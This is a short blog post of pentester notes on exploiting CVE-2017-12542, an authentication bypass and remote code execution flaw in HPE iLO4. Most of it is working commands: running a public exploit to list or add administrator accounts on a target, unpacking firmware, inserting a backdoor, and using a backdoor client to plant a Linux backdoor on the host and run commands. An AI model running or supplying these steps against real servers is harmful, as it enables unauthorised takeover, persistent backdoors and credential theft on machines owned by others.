Home > Exploitation > Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

Some notes on Exploiting HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

The below contains some of my own notes for exploiting CVE-2017-12542.  The below notes are incomplete. I will spend some time on how to get RCE on other version of firmwares for HP iLO (as explained below).

List / Add users on the HP iLO
If you just need to list or add accounts on the HP iLO, you can just use the script from https://github.com/skelsec/CVE-2017-12542 or Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account)

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

or

$ python /pentest/CVE-2017-12542/exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HP iLO
The RCE/Backdoor exploit at https://github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4 currently only works for the below firmwares. Some modifications might be required to work on other versions.

Based on HP’s advisory (https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us0, iLO 4 prior to versions 2.53 are vulnerable.

The firmware for HP iLO can be downloaded from http://pingtool.org/latest-hp-ilo-firmwares/.

Steps on how to get command execution on HP iLO and extract passwords

$ git clone https://github.com/airbus-seclab/ilo4_toolbox

$ curl -s -k  https://x.x.x.x/xmldata?item=all | grep -i “<FWRI>”
<FWRI>2.5.3</FWRI>

$ wget http://downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe –unpack=/tmp/iLO

cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd(“/usr/bin/id”)
ib.remove_linux_backdoor()

Categories: Exploitation
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: